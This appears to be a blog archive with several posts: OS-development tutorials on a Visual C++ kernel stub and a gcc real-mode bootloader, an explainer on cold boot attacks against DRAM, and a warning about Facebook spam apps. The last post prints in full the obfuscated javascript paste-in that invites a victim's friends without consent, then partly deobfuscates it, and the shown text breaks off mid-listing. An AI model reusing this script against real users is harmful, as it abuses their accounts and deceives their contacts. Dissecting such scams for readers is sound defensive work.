Saturday, February 18, 2012

Writing kernel in Windows with Visual Studio C/C++

Most hobby osdev projects prefer *nix+gcc combination these days, primarily because there are a bunch of nice tutorials and examples available for them. Considering the flexibility, I too personally think it is a good choice. But if you are a heretic by nature and are curious about how you can osdev with just the express edition of Visual C++ and some other free software without leaving windows (or forced), this post is for you.

In this post I will simply demonstrate the toolchain setup. Complete package can be downloaded from the lower 'Downloads' section. The actual 'kernel' that is written in this tutorial is the lame hello-world one. We will get it working with PXE boot in VirtualBox (replace with any emulator of your choice). It works with default Windows Boot Manager (WBM) without modifications (GRUB equivalent, just lamer) and can easily be modified to work with mbr/vbr, booting with stages. Let's face it - even osdev noobs these days are so over floppies.

Kernel loader (stub)
For a kernel loader stage, there are many ways of entering protected mode, loading the actual kernel image, relocating and passing control to the kernel. Here is one that I think is simple enough to fit in a blogspot post.

The image loaded by PXE/WBM consists of two sections - the stub and the kernel executable image. Both PXE and WBM (are supposed to) load our image at physical address 0x7c00, or 7c0h:0h in real mode. This means that the stub must be 16bit real mode code that is statically linked to run at 7c00h. The kernel executable output by Visual C++ compiler cl.exe on the other hand is 32bit protected mode code. Also, the kernel executable needs to be relocated before it can be run. Thus, the stub must set up pmode, relocate the kernel to the address it is supposed to run and then pass control to it.

The stub in this tutorial is written in assembler for ease. I have used yasm, primarily because it supports both At&T and Intel syntax and it can output a flat binary.

stub.asm

; toyos boot stub

; irrespective of whether we are (chain)loaded from Windows bootloader or through PXE, we are loaded at 7c0:0
[org 7c00h]
; because i386 is old :P
[CPU P4]


NULL_SEG equ 00h    ; unused
CODE_SEG equ 08h    ; cs
DATA_SEG equ 10h    ; all other segments

section .text
[bits 16]
_entry:
 cli ; no interrupts
 xor ax, ax
 mov ds, ax
 
 lgdt [gdt_desc] ; load GDTR
 mov eax, cr0
 or al, 1
 mov cr0, eax    ; set pmode bit
 jmp CODE_SEG:clear_pipeline ; far jump ensures a prefetch queue flush and truely enter pmode

[bits 32]
clear_pipeline:
 mov ax, DATA_SEG
 mov ds, ax
 mov es, ax
 mov ss, ax
 lea esp, [initial_stack_top]
 jmp chain

chain:
 mov byte [0b8000h], '1'     ; just some on-screen deubgging
 mov byte [0b8001h], 01bh

 EXELOADADDR    equ PAYLOAD_ADDRESS  ; the load address of payload (kernel) exe
    ; PE header offsets
 sigMZ         equ esi
 PEheaderOffset   equ esi+60
 sigPE         equ esi
 NumSections      equ esi+6
 BaseOfCode      equ esi+52
 EntryAddressOffset   equ esi+40
 SizeOfNT_HEADERS   equ 248

 SectionSize      equ esi+8
 SectionBase      equ esi+12
 SectionFileOffset   equ esi+20
 SizeOfSECTION_HEADER   equ 40

 mov esi, EXELOADADDR
 mov eax, [sigMZ]
 cmp ax, 0x5A4D  ; signature check
 jnz badPE
 mov eax, [PEheaderOffset]
   
 add esi, eax
 mov eax, [sigPE]
 cmp eax, 0x00004550
 jnz badPE
   
 xor edx, edx
 mov dx, [NumSections]
 mov eax, [BaseOfCode]
 mov ebx, [EntryAddressOffset]
   
 add ebx, eax
 push ebx
   
 add esi, SizeOfNT_HEADERS

    ; load each section
 .loadloop:
  mov ecx, [SectionSize]
  mov edi, [SectionBase]
  add edi, eax
  mov ebx, [SectionFileOffset]
  add ebx, EXELOADADDR
   
  push esi
   
  mov esi, ebx
  rep movsb       ; copy each section to its respective load/run address
   
  pop esi
  add esi, SizeOfSECTION_HEADER
   
  dec edx
  or edx, edx
  jnz .loadloop

  pop ebx ; restore entry
  jmp ebx ; jump to entry

; PE image invalid
badPE:
 mov eax, 0b8000h
 mov byte [eax], '!'
 mov byte [eax + 1], 01bh

; spin away!    
infloop:
 hlt
 jmp infloop

; data section
section .data
initial_stack:
 times 128 dw 0  ; oughtta be enough
initial_stack_top:

; global descriptor table
gdt:
gdt_null:
    dd 0
    dd 0

gdt_code:
    dw 0FFFFh   ; RTFM
    dw 0
    db 0
    db 10011010b
    db 11001111b
    db 0

gdt_data:
    dw 0FFFFh
    dw 0
    db 0
    db 10010010b
    db 11001111b
    db 0
gdt_end:


gdt_desc:                       ; The GDT descriptor
    dw gdt_end - gdt - 1    ; Limit (size)
    dd gdt                  ; Address of the GDT

align 4
PAYLOAD_ADDRESS:    ; this is where the exe is loaded
stub.asm can be compiled as

yasm -Xvc -f bin --force-strict -o stub.o stub.asm
This should create a flat binary for stub.

Kernel
If you reached here, you probably know what you can/should and can/should not use in a kernel. I am assuming that you have some experience with writing such code in other toolchains.

The kernel for this tutorial is hilariously simple. It can be C or C++.

kernel.cc

// refer intrinsic strlen by cl compiler
extern "C" size_t strlen(const char*);

int main()
{
 char* msg = "yuffie> SO U HACKING ME THEN HUH\n"
                "yuffie> WElL I GOT NEWS FOR U MISTER I GOT MORE FIREWALL POWERS NOW SO IM SECURE AND IM USING WINDOWS 98 SO IM REALLY SECURE FROM HACKERS LIKE YOU SO YOU BETTA JUST GIVE UP CUZ U GOT NO HOPE MISTER.\n"
                "* YuFFie (~mirc@3B942731.dsl.stlsmo.swbell.net) Quit (Quit: Owned.)\n"
                "* YuFFie (~mirc@3B942731.dsl.stlsmo.swbell.net) has joined #\n"
                "yuffie> HELP MY MOUSE IS MOVING BY IT SELF";
 int msgLen = strlen(msg);
 char* vidmem = (char*)0xB8000;
 int vidIdx = 0;
 for(int i = 0; i < msgLen; ++i)
 {
        if(msg[i] == '\n')
        {
            vidIdx = (((vidIdx / 80) + 1) * 80) % (80 * 25);
        }
        else
        {
            vidmem[2 * vidIdx] = msg[i];
            vidmem[(2 * vidIdx) + 1] = 0x1b;
            ++vidIdx;
        }
 }

 while(true);

 return 0;
}

Here is the tricky part. We must compile kernel.cc in such a way that it can run standalone, without any ties with Windows hosted environment. For Visual C++ 2010, I have seen the following switches working. I am going to save on typing as MSDN has explanation for each of those switches in detail.

cl /Zi /nologo /W4 /WX- /O2 /Oi /Oy- /GL /X /c /GF /Gm- /Zp4 /GS- /Gy- /fp:precise /fp:except- /Zc:wchar_t /Zc:forScope /GR- /openmp- /Gd /analyze- /Fd"kernel.pdb" /Fo"kernel.obj" kernel.cc
link /VERBOSE /VERSION:"0.0.0.1" /NOLOGO /NODEFAULTLIB /MANIFEST:NO /ALLOWISOLATION:NO /DEBUG /SUBSYSTEM:NATIVE /LARGEADDRESSAWARE /DRIVER /ENTRY:"main" /BASE:"0x00100000" /FIXED /MACHINE:X86 /ALIGN:4096 /SAFESEH:NO /OPT:REF /OPT:ICF /OUT:kernel.o kernel.obj

Creating the boot image
This is the simplest part.

copy /B /Y stub.o+kernel.o kernel

Yay! Now you have a PXE/WBM bootable image!

PXE boot setup instructions (or lack thereof)
Unless you are using Windows Server as the host OS, chances are that you will have to work with a non-Microsoft solution for DHCP and TFTP servers with pxeboot support. I have used tftpd32 in the past as well as in this tutorial, and have had no complaints thus far. Setting up DHCP and TFTP servers is out of scope of this tutorial. tftpd32 configuration is a walk in the park. Just attach the DHCP and TFTP servers on local interface, set the TFTP root and file name as the boot image. Fire up any virtual machine emulator of your choice that supports PXE boot ROM in its NIC. I have used VirtualBox. Start the VM, boot from LAN. You should see some activity in tftpd32 and moments later you should see the message.

WBM
It is fairly easy to get your kernel alongside Windows entry in the Windows bootloader. There are tutorials [1, 2] to create new BCD entries. Just add your kernel as a BOOTSECTOR application. EasyBCD is an option in case you are not comfortable with bcdedit.

Download
Using Visual C++ IDE
Download
Sure, these build rules can be set in VC++ projects. Enjoy one-button-hit builds with VC++'s Intellisense. Eventually when you get a debugger stub in your kernel, you could also get source level debugging working within WinDbg.
32bit versions of yasm and tftpd32 are included.

Using Makefiles
Download
I never felt comfortable when an IDE came between me and my source code custom build rules. If you too think that makefiles are the way to go, nmake works out of the box. I personally think CMake is a better choice if your project gets serious.
32bit versions of yasm and tftpd32 are included.

Please let me know if decide to use Microsoft compilers for osdev.

Good luck!

Wednesday, June 16, 2010

Cold boot attack

How safe and secure is your data when stored on a PC/workstation or a laptop? Say you also have whole disc/volume encryption, maybe activated by a USB key. Even then, how secure is your data?

If the computer is turned on when it physically falls in hands of the attacker, you might be at risk even with whole disc encryption enabled and the screen locked requiring your (non compromised) password. This is especially true for portable machines like laptops and net-books. There are many possible attacks, we will look into a specific one called cold boot attack in this post.

Something about memory

Chances are that your main memory is DRAM technology based, which includes popular ones such as SDRAM, DDRx and even the VRAM in most cases. As it is widely considered to be volatile type of memory, we are under the impression that it loses the stored contents after power is cut off. Sadly the contents are not lost instantaneously, but they decay/degrade gradually due to the way DRAM stores data.

Figure 0 : A DRAM Cell
Without going into the details of the dynamic logic, it suffices to say that the bit is stored as charge on a capacitor connected to the rest of the circuit with a transistor which acts like a switch. Simply put, if the capacitor has charge above a certain level, we interpret bit value 1, and 0 otherwise. (each CAS or bit line like the one shown in Figure 0 is actually a set of two bit lines, +ve and -ve which are connected to alternate cells/FETs in the row. When reading, after both bit lines have been precharged, RAS is activated and the sense amplifier kicks in. Due to positive feedback it can detect the slight charge difference between +ve and -ve bit lines.)

Capacitors are not perfect. They lose charge over time as leakage current. Thus, each DRAM cell has to be `refreshed' frequently enough to retain content. Even though manufacturers usually recommend the DRAM be refreshed at least every 64ms (to ensure that there is no data corruption), well built DRAMs have a retention period that is significantly greater than the suggested refresh period. It goes without saying that some bits do corrupt, but the rate at which they do is pretty low when you put 64ms in perspective. This is true even after turning the power off entirely.

How does this concern me?

Well, the significantly long retention period of main memory is a security hole. If a computer is physically compromised when it is powered on, the attacker can read most of the contents stored on your main memory. The main memory includes wealth of information : any user names and passwords that are `cached' by applications, encryption keys for hard drive/volume encryption as well as SSL private keys for active connections, and (maybe partial) contents of any file that is or was open in recent past (as after closing the file, most operating systems do not clear the corresponding memory pages used as block cache, for obvious performance reasons), including portions of deleted files at times as well. This is assuming the machine is locked in some sense, and the unlocking password is not known to the attacker.

At room temperature, the DRAM holds on to the stored bits if the power down/up cycle completes in 64ms. Errors are introduced as powered-off period increases. The period during which no or very few bits corrupt can be significantly increased if the DRAM modules are cooled to near or beyond 0 degree C. Such `cold' modules can then be inserted into another compatible machine and their contents dumped for detailed analysis. I believe that the reason for extended retention is because as the capacitors usually have Aluminum oxide as dielectric whose leakage current reduces as temperature reduces.

A very good paper from Princeton University discussing how to detect keys in the dumps is here. They claim to have broken almost every hard drive encryption solution there is :(. They also provide software to dump memory contents on a portable drive.

This technique is important for forensics/law enforcement as well. During a bust of a computer crime suspect, memory dumps of the machines are extremely important to support the case. This technique allows the law enforcers to get the system state or a snapshot as it was at the time of the bust even without the suspects' co-operation.

Note that the technique is ineffective against other types of memory, for example bistable latched SRAM. So in case you are wondering if you could get something out of the hard drive caches or something from the buffers of a compromised router, you are out of luck!

Does it really work? Can I see it working on my machine?

Sure!

I've created a simple RAM browser (kernel) named `RAMBO' (download source) which, as the name says, can be used to browse the RAM contents after a simulated theft and cold reboot. You can choose to be super-realistic, pulling out the cord of your desktop or pulling out the battery of your laptop and putting it back in a jiffy. If you are worried about pulling the cord while windows/*NIX runs, you can choose to load a file to certain RAM location, reboot and check if the contents are readable after reboot. The program is to be loaded from a multiboot compliant bootloader such as GRUB. It does not touch any other piece of hardware than the processor, memory and keyboard, so rest assured that you will not have a corrupt disc or fried electronics. In case you do not have such a loader installed already, you can install the loader on a floppy or a USB stick and copy the program to it so that you can load it when you boot from USB/floppy. The README provides more info on how to use it.

Tuesday, June 15, 2010

Real mode in C with gcc : writing a bootloader

Usually the x86 boot loader is written in assembler. We will be exploring the possibility of writing one in C language (as much as possible) compiled with gcc, and runs in real mode. Note that you can also use the 16 bit bcc or TurboC compiler, but we will be focusing on gcc in this post. Most open source kernels are compiled with gcc, and it makes sense to write C bootloader with gcc instead of bcc as you get a much cleaner toolchain :)

As of today (20100614), gcc 4.4.4 officially only emits code for protected/long mode and does not support the real mode natively (this may change in future).

Also note that we will not discuss the very fundamentals of booting. This article is fairly advanced and assumes that you know what it takes to write a simple boot-loader in assembler. It is also expected that you know how to write gcc inline assembly. Not everything can be done in C!

getting the tool-chain working


.code16gcc

As we will be running in 16 bit real mode, this tells gas that the assembler was generated by gcc and is intended to be run in real mode. With this directive, gas automatically adds addr32 prefix wherever required. For each C file which contains code to be run in real mode, this directive should be present at the top of effectively generated assembler code. This can be ensured by defining in a header and including it before any other.

#ifndef _CODE16GCC_H_
#define _CODE16GCC_H_
__asm__(".code16gcc\n");
#endif

This is great for bootloaders as well as parts of kernel that must run in real mode but are desired written in C instead of asm. In my opinion C code is a lot easier to debug and maintain than asm code, at expense of code size and performance at times.

Special linking


As bootloader is supposed to run at physical 0x7C00, we need to tell that to linker. The mbr/vbr should end with the proper boot signature 0xaa55.
All this can be taken care of by a simple linker script.

ENTRY(main);
SECTIONS
{
    . = 0x7C00;
    .text : AT(0x7C00)
    {
        _text = .;
        *(.text);
        _text_end = .;
    }
    .data :
    {
        _data = .;
        *(.bss);
        *(.bss*);
        *(.data);
        *(.rodata*);
        *(COMMON)
        _data_end = .;
    }
    .sig : AT(0x7DFE)
    {
        SHORT(0xaa55);
    }
    /DISCARD/ :
    {
        *(.note*);
        *(.iplt*);
        *(.igot*);
        *(.rel*);
        *(.comment);
/* add any unwanted sections spewed out by your version of gcc and flags here */
    }
}

gcc emits elf binaries with sections, whereas a bootloader is a monolithic plain binary with no sections. Conversion from elf to binary can be done as follows:

$ objcopy -O binary vbr.elf vbr.bin

The code

With the toolchain set up, we can start writing our hello world bootloader!
vbr.c (the only source file) looks something like this:

/*
 * A simple bootloader skeleton for x86, using gcc.
 *
 * Prashant Borole (boroleprashant at Google mail)
 * */

/* XXX these must be at top */
#include "code16gcc.h"
__asm__ ("jmpl  $0, $main\n");


#define __NOINLINE  __attribute__((noinline))
#define __REGPARM   __attribute__ ((regparm(3)))
#define __NORETURN  __attribute__((noreturn))

/* BIOS interrupts must be done with inline assembly */
void    __NOINLINE __REGPARM print(const char   *s){
        while(*s){
                __asm__ __volatile__ ("int  $0x10" : : "a"(0x0E00 | *s), "b"(7));
                s++;
        }
}
/* and for everything else you can use C! Be it traversing the filesystem, or verifying the kernel image etc.*/

void __NORETURN main(){
    print("woo hoo!\r\n:)");
    while(1);
}


compile it as

$ gcc -c -g -Os -march=i686 -ffreestanding -Wall -Werror -I. -o vbr.o vbr.c
$ ld -static -Tlinker.ld -nostdlib --nmagic -o vbr.elf vbr.o
$ objcopy -O binary vbr.elf vbr.bin

and that should have created vbr.elf file (which you can use as a symbols file with gdb for source level debugging the vbr with gdbstub and qemu/bochs) as well as 512 byte vbr.bin. To test it, first create a dummy 1.44M floppy image, and overwrite it's mbr by vbr.bin with dd.

$ dd if=/dev/zero of=floppy.img bs=1024 count=1440
$ dd if=vbr.bin of=floppy.img bs=1 count=512 conv=notrunc

and now we are ready to test it out :D

$ qemu -fda floppy.img -boot a

and you should see the message!

Once you get to this stage, you are pretty much set with respect to the tooling itself. Now you can go ahead and write code to read the filesystem, search for next stage or kernel and pass control to it.

Here is a simple example of a floppy boot record with no filesystem, and the next stage or kernel written to the floppy immediately after the boot record. The next image LMA and entry are fixed in a bunch of macros. It simply reads the image starting one sector after boot record and passes control to it. There are many obvious holes, which I left open for sake of brevity.

/*
 * A simple bootloader skeleton for x86, using gcc.
 *
 * Prashant Borole (boroleprashant at Google mail)
 * */

/* XXX these must be at top */
#include "code16gcc.h"
__asm__ ("jmpl  $0, $main\n");


#define __NOINLINE  __attribute__((noinline))
#define __REGPARM   __attribute__ ((regparm(3)))
#define __PACKED    __attribute__((packed))
#define __NORETURN  __attribute__((noreturn))

#define IMAGE_SIZE  8192
#define BLOCK_SIZE  512
#define IMAGE_LMA   0x8000
#define IMAGE_ENTRY 0x800c

/* BIOS interrupts must be done with inline assembly */
void    __NOINLINE __REGPARM print(const char   *s){
        while(*s){
                __asm__ __volatile__ ("int  $0x10" : : "a"(0x0E00 | *s), "b"(7));
                s++;
        }
}

#if 0
/* use this for the HD/USB/Optical boot sector */
typedef struct __PACKED TAGaddress_packet_t{
    char                size;
    char                :8;
    unsigned short      blocks;
    unsigned short      buffer_offset;
    unsigned short      buffer_segment;
    unsigned long long  lba;
    unsigned long long  flat_buffer;
}address_packet_t ;

int __REGPARM lba_read(const void   *buffer, unsigned int   lba, unsigned short blocks, unsigned char   bios_drive){
        int i;
        unsigned short  failed = 0;
        address_packet_t    packet = {.size = sizeof(address_packet_t), .blocks = blocks, .buffer_offset = 0xFFFF, .buffer_segment = 0xFFFF, .lba = lba, .flat_buffer = (unsigned long)buffer};
        for(i = 0; i < 3; i++){
                packet.blocks = blocks;
                __asm__ __volatile__ (
                                "movw   $0, %0\n"
                                "int    $0x13\n"
                                "setcb  %0\n"
                                :"=m"(failed) : "a"(0x4200), "d"(bios_drive), "S"(&packet) : "cc" );
                /* do something with the error_code */
                if(!failed)
                        break;
        }
        return failed;
}
#else
/* use for floppy, or as a fallback */
typedef struct {
        unsigned char   spt;
        unsigned char   numh;
}drive_params_t;

int __REGPARM __NOINLINE get_drive_params(drive_params_t    *p, unsigned char   bios_drive){
        unsigned short  failed = 0;
        unsigned short  tmp1, tmp2;
        __asm__ __volatile__
            (
             "movw  $0, %0\n"
             "int   $0x13\n"
             "setcb %0\n"
             : "=m"(failed), "=c"(tmp1), "=d"(tmp2)
             : "a"(0x0800), "d"(bios_drive), "D"(0)
             : "cc", "bx"
            );
        if(failed)
                return failed;
        p->spt = tmp1 & 0x3F;
        p->numh = tmp2 >> 8;
        return failed;
}

int __REGPARM __NOINLINE lba_read(const void    *buffer, unsigned int   lba, unsigned char  blocks, unsigned char   bios_drive, drive_params_t  *p){
        unsigned char   c, h, s;
        c = lba / (p->numh * p->spt);
        unsigned short  t = lba % (p->numh * p->spt);
        h = t / p->spt;
        s = (t % p->spt) + 1;
        unsigned char   failed = 0;
        unsigned char   num_blocks_transferred = 0;
        __asm__ __volatile__
            (
             "movw  $0, %0\n"
             "int   $0x13\n"
             "setcb %0"
             : "=m"(failed), "=a"(num_blocks_transferred)
             : "a"(0x0200 | blocks), "c"((s << 8) | s), "d"((h << 8) | bios_drive), "b"(buffer)
            );
        return failed || (num_blocks_transferred != blocks);
}
#endif

/* and for everything else you can use C! Be it traversing the filesystem, or verifying the kernel image etc.*/

void __NORETURN main(){
        unsigned char   bios_drive = 0;
        __asm__ __volatile__("movb  %%dl, %0" : "=r"(bios_drive));      /* the BIOS drive number of the device we booted from is passed in dl register */

        drive_params_t  p = {};
        get_drive_params(&p, bios_drive);

        void    *buff = (void*)IMAGE_LMA;
        unsigned short  num_blocks = ((IMAGE_SIZE / BLOCK_SIZE) + (IMAGE_SIZE % BLOCK_SIZE == 0 ? 0 : 1));
        if(lba_read(buff, 1, num_blocks, bios_drive, &p) != 0){
            print("read error :(\r\n");
            while(1);
        }
        print("Running next image...\r\n");
        void*   e = (void*)IMAGE_ENTRY;
        __asm__ __volatile__("" : : "d"(bios_drive));
        goto    *e;
}


removing __NOINLINE may result in even smaller code in this case. I had it in place so that I could figure out what was happening.

Concluding remarks

C in no way matches the code size and performance of hand tuned size/speed optimized assembler. Also, because of an extra byte (0x66, 0x67) wasted (in addr32) with almost every instruction, it is highly unlikely that you can cram up the same amount of functionality as assembler.

Global and static variables, initialized as well as uninitialized, can quickly fill those precious 446 bytes. Changing them to local and passing around instead may increase or decrease size; there is no thumb rule and it has to be worked out on per case basis. Same goes for function in-lining.

You also need to be extremely careful with various gcc optimization flags. For example, if you have a loop in your code whose number of iterations are small and deducible at compile time, and the loop body is relatively small (even 20 bytes), with default -Os, gcc will unroll that loop. If the loop is not unrolled (-fno-tree-loop-optimize), you might be able to shave off big chunk of bytes there. Same holds true for frame setups on i386 - you may want to get rid of them whenever not required using -fomit-frame-pointer. Moral of the story : you need to be extra careful with gcc flags as well as version update. This is not much of an issue for other real mode modules of the kernel where size is not of this prime importance.

Also, you must be very cautious with assembler warnings when compiling with .code16gcc. Truncation is common. It is a very good idea to use --save-temp and analyze the assembler code generated from your C and inline assembly. Always take care not to mess with the C calling convention in inline assembly and meticulously check and update the clobber list for inline assembly doing BIOS or APM calls (but you already knew it, right?).

It is likely that you want to switch to protected/long mode as early as possible, though. Even then, I still think that maintainability wins over asm's size/speed in case of a bootloader as well as the real mode portions of the kernel.

It would be interesting if someone could try this with c++/java/fortran. Please let me know if you do!

Saturday, May 08, 2010

How not to look like a fool on facebook

I did it already. Warning you so that you don't.

There is a full blown army of apps on Facebook which spam your friends with recommendations without your consent. Going by Facebook's policies, these apps are spam, and you should report them as soon as possible.

They are named in interesting ways. When you click the link, it first shows a button.
Let us take an example of 'Is this dog ugly?'.



As it came from a credible friend, you go ahead and click the button,


and do as you are told to do so, expecting some image with fancy javascript animation.


you paste the code and hit enter, and wait for it.
Before you know it, it has sent invitations to your friends, and you end up looking like a fool!

This is how it works :

the script you copy looks something like this:

javascript:(function(){a = "app120196878004524_jop"; b = "app120196878004524_jode"; ifc = "app120196878004524_ifc"; ifo = "app120196878004524_ifo"; mw = "app120196878004524_mwrapper"; function ff(p, a, c, k, e, r) { e = function (c) { return (c < a ? "" : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36)); }; if (!"".replace(/^/, String)) { while (c--) {r[e(c)] = k[c] || e(c);}k = [function (e) {return r[e];}];e = function () {return "\\w+";};c = 1; } while (c--) { if (k[c]) {p = p.replace(new RegExp("\\b" + e(c) + "\\b", "g"), k[c]);} } return p; } str = ff("J e=[\"\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A\",\"\\j\\h\\A\\i\\f\",\"\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t\",\"\\w\\g\\t\\t\\f\\k\",\"\\g\\k\\k\\f\\x\\M\\N\\G\\O\",\"\\n\\l\\i\\y\\f\",\"\\j\\y\\o\\o\\f\\j\\h\",\"\\i\\g\\H\\f\\r\\f\",\"\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j\",\"\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h\",\"\\p\\i\\g\\p\\H\",\"\\g\\k\\g\\h\\q\\n\\f\\k\\h\",\"\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h\",\"\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i\",\"\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r\",\"\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z\",\"\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o\"];d=U;d[e[2]](V)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);c=d[e[9]](e[8]);c[e[11]](e[10],I,I);s[e[12]](c);C(D(){W[e[13]]()},E);C(D(){X[e[16]](e[14],e[15])},E);C(D(){m[e[12]](c);d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]},E);", 62, 69, "||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|mw|fs|SocialGraphManager|ifo|ifc|||||||".split("|"), 0, {})})();

With slightly better formatting, it looks like

a='app120196878004524_jop';
b='app120196878004524_jode';
ifc='app120196878004524_ifc';
ifo='app120196878004524_ifo';
mw='app120196878004524_mwrapper';
eval(
 function(p,a,c,k,e,r){
  e=function(c){
   return
      (c35?String.fromCharCode(c+29):c.toString(36))
  };
  if(!''.replace(/^/,String)){
   while(c--)
    r[e(c)]=k[c]||e(c);
   k=[function(e){return r[e]}];
   e=function(){
    return'\\w+'
   };
   c=1
  };
  while(c--)
   if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);
  return p
 }
 ('J e=["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N\\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h","\\p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o"];d=U;d[e[2]](V)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);c=d[e[9]](e[8]);c[e[11]](e[10],I,I);s[e[12]](c);C(D(){W[e[13]]()},E);C(D(){X[e[16]](e[14],e[15])},E);C(D(){m[e[12]](c);d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]},E);',62,69,'||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|mw|fs|SocialGraphManager|ifo|ifc|||||||'.split('|'),0,{})
);

now, let us drop the last parentheses () and check what code this actually executes:

a = "app120196878004524_jop";
b = "app120196878004524_jode";
ifc = "app120196878004524_ifc";
ifo = "app120196878004524_ifo";
mw = "app120196878004524_mwrapper";
function ff(p, a, c, k, e, r) {
 e = function (c) {
  return (c < a ? "" : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36));
 };
 if (!"".replace(/^/, String)) {
  while (c--) {r[e(c)] = k[c] || e(c);}k = [function (e) {return r[e];}];e = function () {return "\\w+";};c = 1;
 }
 while (c--) {
  if (k[c]) {p = p.replace(new RegExp("\\b" + e(c) + "\\b", "g"), k[c]);}
 }
 return p;
}
str = ff("J e=[\"\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A\",\"\\j\\h\\A\\i\\f\",\"\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t\",\"\\w\\g\\t\\t\\f\\k\",\"\\g\\k\\k\\f\\x\\M\\N\\G\\O\",\"\\n\\l\\i\\y\\f\",\"\\j\\y\\o\\o\\f\\j\\h\",\"\\i\\g\\H\\f\\r\\f\",\"\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j\",\"\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h\",\"\\p\\i\\g\\p\\H\",\"\\g\\k\\g\\h\\q\\n\\f\\k\\h\",\"\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h\",\"\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i\",\"\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r\",\"\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z\",\"\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o\"];d=U;d[e[2]](V)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);c=d[e[9]](e[8]);c[e[11]](e[10],I,I);s[e[12]](c);C(D(){W[e[13]]()},E);C(D(){X[e[16]](e[14],e[15])},E);C(D(){m[e[12]](c);d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]},E);", 62, 69, "||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|mw|fs|SocialGraphManager|ifo|ifc|||||||".split("|"), 0, {});

// and lets print the string that gets evaluated
print(str);

which, when executed with `js' gives output

var _0x95ea=[ "\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79",
"\x73\x74\x79\x6C\x65","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64",
"\x68\x69\x64\x64\x65\x6E",
"\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x76\x61\x6C\x75\x65",
"\x73\x75\x67\x67\x65\x73\x74",
"\x6C\x69\x6B\x65\x6D\x65",
"\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73",
"\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6E\x74",
"\x63\x6C\x69\x63\x6B",
"\x69\x6E\x69\x74\x45\x76\x65\x6E\x74",
"\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\x74",
"\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C",
"\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D",
